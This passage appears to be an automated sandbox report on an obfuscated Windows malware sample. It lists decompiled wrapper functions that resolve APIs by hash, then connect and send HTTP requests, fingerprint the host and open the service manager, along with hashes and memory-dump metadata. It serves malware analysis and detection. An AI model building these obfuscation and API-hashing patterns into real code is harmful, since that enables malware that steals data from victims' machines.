                                                      0x00237994
                                                      0x002379a0
                                                      0x002379a3
                                                      0x002379ba
                                                      0x002379c1
                                                      0x002379c4
                                                      0x002379cb
                                                      0x002379d2
                                                      0x002379d6
                                                      0x002379dd
                                                      0x002379e4
                                                      0x002379f1
                                                      0x00237a07
                                                      0x00237a0e

                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00237A07
                                                      Strings
                                                      • e list for clipped items, xrefs: 0023799B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConnectInternet
                                                      • String ID: e list for clipped items
                                                      • API String ID: 3050416762-922771492
                                                      • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                                      • Instruction ID: 174ac6a0025630c5a4b58eb26ae57f67e557bed5730471b30b5aef71548e4331
                                                      • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                                      • Instruction Fuzzy Hash: FC212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566220D7719A60EB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x0022295f
                                                      0x00222964
                                                      0x00222967
                                                      0x0022296a
                                                      0x0022296d
                                                      0x0022296e
                                                      0x0022296f
                                                      0x00222977
                                                      0x00222985
                                                      0x0022298a
                                                      0x00222992
                                                      0x0022299a
                                                      0x002229a2
                                                      0x002229a9
                                                      0x002229b0
                                                      0x002229b7
                                                      0x002229bb
                                                      0x002229cf
                                                      0x002229dc
                                                      0x002229e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                                      • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                                      • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                                      • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x0022c6e1
                                                      0x0022c6e6
                                                      0x0022c6f0
                                                      0x0022c6fc
                                                      0x0022c703
                                                      0x0022c706
                                                      0x0022c70d
                                                      0x0022c711
                                                      0x0022c715
                                                      0x0022c71c
                                                      0x0022c723
                                                      0x0022c72a
                                                      0x0022c731
                                                      0x0022c738
                                                      0x0022c751
                                                      0x0022c762
                                                      0x0022c768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                                      • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                                      • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                                      • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00238422, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00238422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E002307A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}











                                                      0x00238428
                                                      0x0023842b
                                                      0x0023842e
                                                      0x00238430
                                                      0x00238433
                                                      0x00238436
                                                      0x00238439
                                                      0x0023843d
                                                      0x0023843e
                                                      0x00238443
                                                      0x0023844a
                                                      0x00238453
                                                      0x0023845a
                                                      0x00238461
                                                      0x00238468
                                                      0x0023847c
                                                      0x0023847f
                                                      0x00238486
                                                      0x0023848d
                                                      0x00238498
                                                      0x0023849b
                                                      0x002384a8
                                                      0x002384be
                                                      0x002384c3

                                                      APIs
                                                      • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002384BE
                                                      Strings
                                                      • e list for clipped items, xrefs: 0023844E
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HttpRequestSend
                                                      • String ID: e list for clipped items
                                                      • API String ID: 360639707-922771492
                                                      • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                                      • Instruction ID: 746990952968a466e81c6f81cee0d18d9426a99179eb708c2e3a05ea667d4097
                                                      • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                                      • Instruction Fuzzy Hash: 921119B180120DFFCF05DF94CD4599EBF75BB44314F208288F91466291C3768B249B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022F74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0022F74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E0022602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E002307A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}











                                                      0x0022f757
                                                      0x0022f765
                                                      0x0022f76a
                                                      0x0022f774
                                                      0x0022f782
                                                      0x0022f787
                                                      0x0022f78f
                                                      0x0022f793
                                                      0x0022f79a
                                                      0x0022f7ac
                                                      0x0022f7af
                                                      0x0022f7b6
                                                      0x0022f7c3
                                                      0x0022f7d1
                                                      0x0022f7d7

                                                      APIs
                                                      • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 0022F7D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: G
                                                      • API String ID: 2681117516-4236931613
                                                      • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                                      • Instruction ID: 50358eb4719f15bb8ae9254565d7af0b36ffe565fa352db5e139077aefef3050
                                                      • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                                      • Instruction Fuzzy Hash: 65015771900208FBEB04DFA4DD4AA9EBFB5EF84310F208088F50866290E6B15B20DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002276F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E002276F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E002307A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}












                                                      0x002276fe
                                                      0x00227701
                                                      0x00227703
                                                      0x00227706
                                                      0x00227707
                                                      0x00227708
                                                      0x0022770d
                                                      0x00227714
                                                      0x0022771d
                                                      0x00227724
                                                      0x00227730
                                                      0x00227738
                                                      0x00227740
                                                      0x00227747
                                                      0x0022774e
                                                      0x00227755
                                                      0x00227764
                                                      0x00227767
                                                      0x00227774
                                                      0x00227780
                                                      0x00227786

                                                      APIs
                                                      • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 00227780
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: nS8U
                                                      • API String ID: 2623510744-2564412997
                                                      • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                                      • Instruction ID: 79244adceab87efe14280bbff0486605b759cf87e297d259b2eb4aeebbfdfa10
                                                      • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                                      • Instruction Fuzzy Hash: 1E0125B5D01218FBEB04DFA4D90A9EEBFB5EF40314F208099E8186B251E7B55B249B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x00221006
                                                      0x00221009
                                                      0x0022100c
                                                      0x00221011
                                                      0x00221016
                                                      0x0022101d
                                                      0x00221026
                                                      0x0022102d
                                                      0x00221034
                                                      0x0022103b
                                                      0x00221047
                                                      0x0022104f
                                                      0x00221057
                                                      0x0022105e
                                                      0x00221065
                                                      0x0022106c
                                                      0x00221073
                                                      0x00221077
                                                      0x0022108b
                                                      0x00221096
                                                      0x0022109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                                      • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                                      • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                                      • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0022602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E002307A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}












                                                      0x00226033
                                                      0x00226036
                                                      0x00226038
                                                      0x0022603b
                                                      0x0022603c
                                                      0x0022603d
                                                      0x00226042
                                                      0x00226049
                                                      0x00226055
                                                      0x0022605c
                                                      0x00226063
                                                      0x0022606a
                                                      0x00226081
                                                      0x00226084
                                                      0x0022608b
                                                      0x00226092
                                                      0x00226099
                                                      0x002260a6
                                                      0x002260b2
                                                      0x002260b8

                                                      APIs
                                                      • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002260B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: /Fq
                                                      • API String ID: 3545744682-1299280358
                                                      • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                                      • Instruction ID: 05d6f1db6c618502e268fd00a24aabbbe5fb638ec44fb1f390ddb9fecbb1d508
                                                      • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                                      • Instruction Fuzzy Hash: B5011AB5C1121CBBDB04EFE4D94A9EEBFB4EF41314F108189E8086B251D3B54B649F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E0022595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E002307A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}








                                                      0x0022595d
                                                      0x0022595e
                                                      0x00225960
                                                      0x00225963
                                                      0x00225965
                                                      0x00225968
                                                      0x00225969
                                                      0x0022596a
                                                      0x0022596f
                                                      0x00225979
                                                      0x00225982
                                                      0x00225989
                                                      0x00225990
                                                      0x00225997
                                                      0x0022599e
                                                      0x002259a2
                                                      0x002259a9
                                                      0x002259c2
                                                      0x002259ce
                                                      0x002259d4

                                                      APIs
                                                      • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002259CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFindNext
                                                      • String ID: 4
                                                      • API String ID: 2029273394-293933855
                                                      • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                                      • Instruction ID: 9db6eecf0f5261ba075a84a789176aa98df66d05aa670ac8871c2e06ca86f31e
                                                      • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                                      • Instruction Fuzzy Hash: 70014676D11218BBEB14DFA4D84A8DEBE78EF40354F108188E80867250E7B25F249BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x00234f80
                                                      0x00234f81
                                                      0x00234f82
                                                      0x00234f86
                                                      0x00234f87
                                                      0x00234f8c
                                                      0x00234fa5
                                                      0x00234fa8
                                                      0x00234faf
                                                      0x00234fb6
                                                      0x00234fc7
                                                      0x00234fca
                                                      0x00234fd7
                                                      0x00234fe2
                                                      0x00234fe7

                                                      APIs
                                                      • CloseHandle.KERNEL32(003E66D8), ref: 00234FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                                      • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                                      • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                                      • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023375D, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 43%
                                                      			E0023375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E0022602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E002307A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}












                                                      0x00233764
                                                      0x00233769
                                                      0x0023376a
                                                      0x0023376d
                                                      0x0023376e
                                                      0x00233771
                                                      0x00233774
                                                      0x00233775
                                                      0x00233778
                                                      0x0023377b
                                                      0x0023377e
                                                      0x00233781
                                                      0x00233782
                                                      0x00233784
                                                      0x00233785
                                                      0x0023378a
                                                      0x00233794
                                                      0x0023379d
                                                      0x002337a0
                                                      0x002337a3
                                                      0x002337aa
                                                      0x002337b1
                                                      0x002337b8
                                                      0x002337bf
                                                      0x002337c6
                                                      0x002337d2
                                                      0x002337da
                                                      0x002337e2
                                                      0x002337f6
                                                      0x0023380a
                                                      0x00233810

                                                      APIs
                                                      • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0023380A
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID:
                                                      • API String ID: 2039140958-0
                                                      • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                                      • Instruction ID: 20776f41622532531ab99a97fcf37a9e1e38b73e794eda9eeb744ac407c128c5
                                                      • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                                      • Instruction Fuzzy Hash: 4E1117B1802219BBCF55DF95DD098DF7EB9EF49360F104048F90862160C3B14A64DBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x0022b569
                                                      0x0022b56a
                                                      0x0022b56d
                                                      0x0022b572
                                                      0x0022b574
                                                      0x0022b577
                                                      0x0022b57a
                                                      0x0022b57d
                                                      0x0022b580
                                                      0x0022b583
                                                      0x0022b586
